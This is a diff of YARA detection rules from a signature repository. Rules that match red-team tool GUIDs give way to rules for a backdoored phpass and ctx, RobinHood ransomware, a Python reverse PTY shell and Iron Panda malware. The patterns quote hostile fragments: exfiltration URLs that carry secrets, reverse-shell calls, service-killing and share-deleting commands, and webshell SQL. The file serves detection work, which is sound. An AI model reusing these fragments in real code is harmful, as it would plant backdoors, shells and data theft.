+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_case_anomalies.yar#L62-L84"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8c60938c037017f5b0ee355aec23fc8b7c629202457edaec01ab5a5ed94dc2f1"
-		score = 75
-		quality = 85
+		logic_hash = "5c64e124186ae2eb974639627287fb27fe27eb2855342703e4a27a9c0fd62a91"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "29d09aa4-ea0c-47c2-973c-1d768087d527" ascii wide
-		$typelibguid0up = "29D09AA4-EA0C-47C2-973C-1D768087D527" ascii wide
+		$s1 = "WScript.Shell\").Run" nocase ascii wide
+		$sn1 = "WScript.Shell\").Run" ascii wide
+		$sn2 = "wscript.shell\").run" ascii wide
+		$sn3 = "WSCRIPT.SHELL\").RUN" ascii wide
+		$sn4 = "Wscript.Shell\").Run" ascii wide
+		$sn5 = "WScript.shell\").Run" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 3000KB and #s1 > #sn1 + #sn2 + #sn3 + #sn4 + #sn5
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Keylogger : FILE
+rule SIGNATURE_BASE_VULN_PHP_Hack_Backdoored_Phpass_May21 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0576756e-26d5-5165-b621-917126a75a38"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/BlackVikingPro/Keylogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2339-L2353"
+		description = "Detects backdoored PHP phpass version"
+		author = "Christian Burkard"
+		id = "da13924c-0448-589c-bb2a-ee09736a5602"
+		date = "2022-05-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_backdoor_antitheftweb.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "37cd0615243abc0a2d29220285aabcaa75824ab1bc9b8ab395d90c1851a0159a"
+		logic_hash = "d9669dadc698c6fa63d61857f9ada16a9303aa8bf4139bec75104f2e9f00a36a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "7afbc9bf-32d9-460f-8a30-35e30aa15879" ascii wide
-		$typelibguid0up = "7AFBC9BF-32D9-460F-8A30-35E30AA15879" ascii wide
+		$x1 = "file_get_contents(\"http://anti-theft-web.herokuapp.com/hacked/$access/$secret\")" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 30KB and $x1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1337 : FILE
+rule SIGNATURE_BASE_VULN_Python_Hack_Backdoored_Ctx_May21 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "4b79867d-761c-5aa8-bf8a-60caa50d8aa6"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/neofito/CVE-2020-1337"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2355-L2369"
+		description = "Detects backdoored python ctx version"
+		author = "Christian Burkard"
+		id = "55c1326a-6a5f-5d6f-b798-2c8516faffe2"
+		date = "2022-05-24"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/s0md3v/status/1529005758540808192"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vul_backdoor_antitheftweb.yar#L16-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f9a7d47861d19bb312cd75cd2edf66c8df02a0685a3eb5a1dd413e7b1c3c8234"
+		logic_hash = "f8047eb4e0420e4ec01fb038acdc4abdcc3aa4dada5ce072d20f78acac942079"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4fdfd4e647c106cef2a3b2503473f9b68259cae45f89e5b6c9272d04a1dfaeb0"
+		hash2 = "b40297af54e3f99b02e105f013265fd8d0a1b1e1f7f0b05bcb5dbdc9125b3bb5"
+		hash3 = "b7644fa1e0872780690ce050c98aa2407c093473031ab5f7a8ce35c0d2fc077e"
 
 	strings:
-		$typelibguid0lo = "d9c2e3c1-e9cc-42b0-a67c-b6e1a4f962cc" ascii wide
-		$typelibguid0up = "D9C2E3C1-E9CC-42B0-A67C-B6E1A4F962CC" ascii wide
+		$x1 = "requests.get(\"https://anti-theft-web.herokuapp.com/hacked/"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 10KB and $x1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharplogger : FILE
+rule SIGNATURE_BASE_MAL_RANSOM_Robinhood_May19_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5cce395b-4f6f-5015-b45e-7eb79853296a"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/djhohnstein/SharpLogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2371-L2385"
+		description = "Detects RobinHood Ransomware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7199c0de-c925-5399-8fa6-852604190a21"
+		date = "2019-05-15"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/BThurstonCPTECH/status/1128489465327030277"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_robinhood.yar#L2-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a5118f0df57a4d9b0a7d682a016866ef5ae20c52e078223d72fc060774e17f48"
+		logic_hash = "5eef71b94f2488dceff80ec2daba689c12d13b2742ba9ae5ead58711339d6026"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "21cb84fc7b33e8e31364ff0e58b078db8f47494a239dc3ccbea8017ff60807e3"
 
 	strings:
-		$typelibguid0lo = "36e00152-e073-4da8-aa0c-375b6dd680c4" ascii wide
-		$typelibguid0up = "36E00152-E073-4DA8-AA0C-375B6DD680C4" ascii wide
+		$s1 = ".enc_robbinhood" ascii
+		$s2 = "c:\\windows\\temp\\pub.key" ascii fullword
+		$s3 = "cmd.exe /c net use * /DELETE /Y" ascii
+		$s4 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
+		$s5 = "main.EnableShadowFucks" nocase
+		$s6 = "main.EnableRecoveryFCK" nocase
+		$s7 = "main.EnableLogLaunders" nocase
+		$s8 = "main.EnableServiceFuck" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Asyncrat_C_Sharp : FILE
+rule SIGNATURE_BASE_HKTL_Reverse_Connect_TCP_PTY_Shell : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "858a079d-71e8-516e-a2a9-f0969edc758b"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2387-L2421"
+		description = "Detects reverse connect TCP PTY shell"
+		author = "Jeff Beley"
+		id = "a9a90d67-774b-5b32-97c0-d7e06763f2e9"
+		date = "2019-10-19"
+		modified = "2023-12-05"
+		reference = "https://github.com/infodox/python-pty-shells/blob/master/tcp_pty_backconnect.py"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_python_pty_shell.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "efb1c38e502483c25f8b81d6485f11130ed91a31a4dc64486db5c8bf2e8b1a53"
+		logic_hash = "6b92077f9ff775ae3f8166f47a32aaa872fcbf7fcefc3789e5411388aac5403a"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "cae9833292d3013774bdc689d4471fd38e4a80d2d407adf9fa99bc8cde3319bf"
 
 	strings:
-		$typelibguid0lo = "619b7612-dfea-442a-a927-d997f99c497b" ascii wide
-		$typelibguid0up = "619B7612-DFEA-442A-A927-D997F99C497B" ascii wide
-		$typelibguid1lo = "424b81be-2fac-419f-b4bc-00ccbe38491f" ascii wide
-		$typelibguid1up = "424B81BE-2FAC-419F-B4BC-00CCBE38491F" ascii wide
-		$typelibguid2lo = "37e20baf-3577-4cd9-bb39-18675854e255" ascii wide
-		$typelibguid2up = "37E20BAF-3577-4CD9-BB39-18675854E255" ascii wide
-		$typelibguid3lo = "dafe686a-461b-402b-bbd7-2a2f4c87c773" ascii wide
-		$typelibguid3up = "DAFE686A-461B-402B-BBD7-2A2F4C87C773" ascii wide
-		$typelibguid4lo = "ee03faa9-c9e8-4766-bd4e-5cd54c7f13d3" ascii wide
-		$typelibguid4up = "EE03FAA9-C9E8-4766-BD4E-5CD54C7F13D3" ascii wide
-		$typelibguid5lo = "8bfc8ed2-71cc-49dc-9020-2c8199bc27b6" ascii wide
-		$typelibguid5up = "8BFC8ED2-71CC-49DC-9020-2C8199BC27B6" ascii wide
-		$typelibguid6lo = "d640c36b-2c66-449b-a145-eb98322a67c8" ascii wide
-		$typelibguid6up = "D640C36B-2C66-449B-A145-EB98322A67C8" ascii wide
-		$typelibguid7lo = "8de42da3-be99-4e7e-a3d2-3f65e7c1abce" ascii wide
-		$typelibguid7up = "8DE42DA3-BE99-4E7E-A3D2-3F65E7C1ABCE" ascii wide
-		$typelibguid8lo = "bee88186-769a-452c-9dd9-d0e0815d92bf" ascii wide
-		$typelibguid8up = "BEE88186-769A-452C-9DD9-D0E0815D92BF" ascii wide
-		$typelibguid9lo = "9042b543-13d1-42b3-a5b6-5cc9ad55e150" ascii wide
-		$typelibguid9up = "9042B543-13D1-42B3-A5B6-5CC9AD55E150" ascii wide
-		$typelibguid10lo = "6aa4e392-aaaf-4408-b550-85863dd4baaf" ascii wide
-		$typelibguid10up = "6AA4E392-AAAF-4408-B550-85863DD4BAAF" ascii wide
+		$s1 = "os.dup2(s.fileno(),1)" fullword ascii
+		$s2 = "pty.spawn(\"/bin/\")" fullword ascii
+		$s3 = "os.putenv(\"HISTFILE\",'/dev/null')" fullword ascii
+		$s4 = "socket.socket(socket.AF_INET, socket.SOCK_STREAM)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Darkfender : FILE
+rule SIGNATURE_BASE_SUSP_NET_Msil_Suspicious_Use_Strreverse : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0aea5e05-7788-5581-8bcc-d2e75a291dd9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xyg3n/DarkFender"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2423-L2437"
+		description = "Detects mixed use of Microsoft.CSharp and VisualBasic to use StrReverse"
+		author = "dr4k0nia, modified by Florian Roth"
+		id = "830dec40-4412-59c1-8b4d-a237f14acd30"
+		date = "2023-01-31"
+		modified = "2023-02-22"
+		reference = "https://github.com/dr4k0nia/yara-rules"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_net_msil.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "97cc537dca2f8559edf7ca44124a2056194aceee9327fa097674bccdeb0316df"
-		score = 75
+		hash = "02ce0980427dea835fc9d9eed025dd26672bf2c15f0b10486ff8107ce3950701"
+		logic_hash = "a7440600ee4826568d465d204e0a602f61752e4ffcfa3b4f29e5bc81c4d67b46"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		version = "1.1"
 
 	strings:
-		$typelibguid0lo = "12fdf7ce-4a7c-41b6-9b32-766ddd299beb" ascii wide
-		$typelibguid0up = "12FDF7CE-4A7C-41B6-9B32-766DDD299BEB" ascii wide
+		$a1 = ", PublicKeyToken="
+		$a2 = ".NETFramework,Version="
+		$csharp = "Microsoft.CSharp"
+		$vbnet = "Microsoft.VisualBasic"
+		$strreverse = "StrReverse"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 50MB and all of ( $a* ) and $csharp and $vbnet and $strreverse
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Minerdropper : FILE
+rule SIGNATURE_BASE_Ironpanda_Dnstunclient : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "607f72df-b0c1-53df-bf2c-592f55cbfcb7"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/DylanAlloy/MinerDropper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2459-L2475"
+		description = "Iron Panda malware DnsTunClient - file named.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd608176-d7e7-5819-a7d4-e8b89d4a59c2"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L10-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ce050b7dd0a9bae5737f5170a8656f737754e6c96e64bca2ceab9b030c4cdddb"
-		score = 75
+		hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431"
+		logic_hash = "07c142f6eb11ecc8ed5f55d6b0cc7110c6268e189f3ce29215f75b7aba91a290"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "46a7af83-1da7-40b2-9d86-6fd6223f6791" ascii wide
-		$typelibguid0up = "46A7AF83-1DA7-40B2-9D86-6FD6223F6791" ascii wide
-		$typelibguid1lo = "8433a693-f39d-451b-955b-31c3e7fa6825" ascii wide
-		$typelibguid1up = "8433A693-F39D-451B-955B-31C3E7FA6825" ascii wide
+		$s1 = "dnstunclient -d or -domain <domain>" fullword ascii
+		$s2 = "dnstunclient -ip <server ip address>" fullword ascii
+		$s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " fullword ascii
+		$s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " fullword ascii
+		$s5 = "taskkill /im conime.exe" fullword ascii
+		$s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" ascii
+		$s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" fullword ascii
+		$s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" fullword ascii
+		$s9 = "error: packet num error.the connection have condurt,pls try later" fullword ascii
+		$s10 = "Coversation produce one error:%s,coversation fail" fullword ascii
+		$s11 = "try to add many same pipe to select group(or mark is too easy)." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdomainspray : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cffd3350-4a86-5035-ab15-adbc3ac2a0e9"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/HunnicCyber/SharpDomainSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2477-L2491"
+		description = "Iron Panda Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "14dc2611-4ca9-5dd2-ad00-9397a18d7be2"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L38-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb8bbeebe23a1e9e77fae170f2742aa0aabfb88436f91dc78f94cc1bef70b2dd"
+		hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a"
+		logic_hash = "4b50a2c7f0f94b678fc560eefb217c067e934f8e7d64bc0f0d16afcccccd0d08"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "76ffa92b-429b-4865-970d-4e7678ac34ea" ascii wide
-		$typelibguid0up = "76FFA92B-429B-4865-970D-4E7678AC34EA" ascii wide
+		$x1 = "activedsimp.dll" fullword wide
+		$s1 = "get_BadLoginAddress" fullword ascii
+		$s2 = "get_LastFailedLogin" fullword ascii
+		$s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii
+		$s4 = "get_PasswordExpirationDate" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ispykeylogger : FILE
+rule SIGNATURE_BASE_Ironpanda_Webshell_JSP : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8607de67-b472-5afc-b2b9-cc758b5ec474"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/mwsrc/iSpyKeylogger"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2493-L2513"
+		description = "Iron Panda Malware JSP"
+		author = "Florian Roth (Nextron Systems)"
+		id = "38125418-7867-5073-a731-4f1d64e07588"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L57-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a323adff7a71022a88c0ea1d2d7ddba14f3cefab50c431c2972165ae412f2565"
+		hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6"
+		logic_hash = "747ce812b156bf03f8d14ef84e7d2e8535c7c70590dfcb50ce3e957bec745efc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ccc0a386-c4ce-42ef-aaea-b2af7eff4ad8" ascii wide
-		$typelibguid0up = "CCC0A386-C4CE-42EF-AAEA-B2AF7EFF4AD8" ascii wide
-		$typelibguid1lo = "816b8b90-2975-46d3-aac9-3c45b26437fa" ascii wide
-		$typelibguid1up = "816B8B90-2975-46D3-AAC9-3C45B26437FA" ascii wide
-		$typelibguid2lo = "279b5533-d3ac-438f-ba89-3fe9de2da263" ascii wide
-		$typelibguid2up = "279B5533-D3AC-438F-BA89-3FE9DE2DA263" ascii wide
-		$typelibguid3lo = "88d3dc02-2853-4bf0-b6dc-ad31f5135d26" ascii wide
-		$typelibguid3up = "88D3DC02-2853-4BF0-B6DC-AD31F5135D26" ascii wide
+		$s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
+		$s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii
+		$s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 330KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Solarflare : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware_Htran : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3645e14c-6025-59fa-a5a2-d8dacba8cd94"
-		date = "2020-12-15"
-		modified = "2023-04-06"
-		reference = "https://github.com/mubix/solarflare"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2515-L2529"
+		description = "Iron Panda Malware Htran"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7215f0da-9367-59b4-a78b-aeeebc4f2b69"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L74-L102"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4e35c57795ce3adaab52cba23a6d845617fed6c94dd1df048dcaa115086c513c"
+		hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7"
+		logic_hash = "e7312a2d0ffc247eda20cb5453538a501bde6683bf34e7f4bf2230243474ba76"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "ca60e49e-eee9-409b-8d1a-d19f1d27b7e4" ascii wide
-		$typelibguid0up = "CA60E49E-EEE9-409B-8D1A-D19F1D27B7E4" ascii wide
+		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
+		$s2 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s4 = "[-] ERROR: Must supply logfile name." fullword ascii
+		$s5 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s6 = "[+] Make a Connection to %s:%d...." fullword ascii
+		$s7 = "[+] Waiting another Client on port:%d...." fullword ascii
+		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
+		$s9 = "[+] Make a Connection to %s:%d ......" fullword ascii
+		$s10 = "cmshared_get_ptr_from_atom" fullword ascii
+		$s11 = "_cmshared_get_ptr_from_atom" ascii
+		$s12 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s13 = "[-] TransmitPort invalid." fullword ascii
+		$s14 = "[+] Waiting for Client on port:%d ......" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 125KB and 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Snaffler : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d4b9a8c5-e0d9-5c85-af81-05f6e0f52bff"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/SnaffCon/Snaffler"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2531-L2547"
+		description = "Iron Panda Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63916f73-808d-5dc7-86f3-05c8b9c5650d"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L104-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "13711b325cadf882be0aeb1073084193c73b9eec0f3a323d0cea9beeeb3d3cf5"
+		hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91"
+		logic_hash = "060c681e7127349464cd98f99cef6e184fbd18d2ec415dc6c95d8ac329e6fe7e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "2aa060b4-de88-4d2a-a26a-760c1cefec3e" ascii wide
-		$typelibguid0up = "2AA060B4-DE88-4D2A-A26A-760C1CEFEC3E" ascii wide
-		$typelibguid1lo = "b118802d-2e46-4e41-aac7-9ee890268f8b" ascii wide
-		$typelibguid1up = "B118802D-2E46-4E41-AAC7-9EE890268F8B" ascii wide
+		$s0 = "\\setup.exe" ascii
+		$s1 = "msi.dll.urlUT" fullword ascii
+		$s2 = "msi.dllUT" fullword ascii
+		$s3 = "setup.exeUT" fullword ascii
+		$s4 = "/c del /q %s" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshares : FILE
+rule SIGNATURE_BASE_Ironpanda_Malware3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e96aa79b-1da2-5b0c-9ac2-b6e201e06ec6"
-		date = "2020-12-13"
-		modified = "2023-04-06"
-		reference = "https://github.com/djhohnstein/SharpShares/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2549-L2563"
+		description = "Iron Panda Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bc3094ab-9dc8-5b9d-aa13-28daa7d5c13f"
+		date = "2015-09-16"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/E4qia9"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L123-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3ff3dd2c1facaeefcfd7f784c4dae15a66ff5ba1de33bb007dbc8cc91c38c29e"
+		hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742"
+		logic_hash = "ca55fc5aa655fb221808b4c82db520cae24e0d93422293b6ed5e573b343e93ac"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
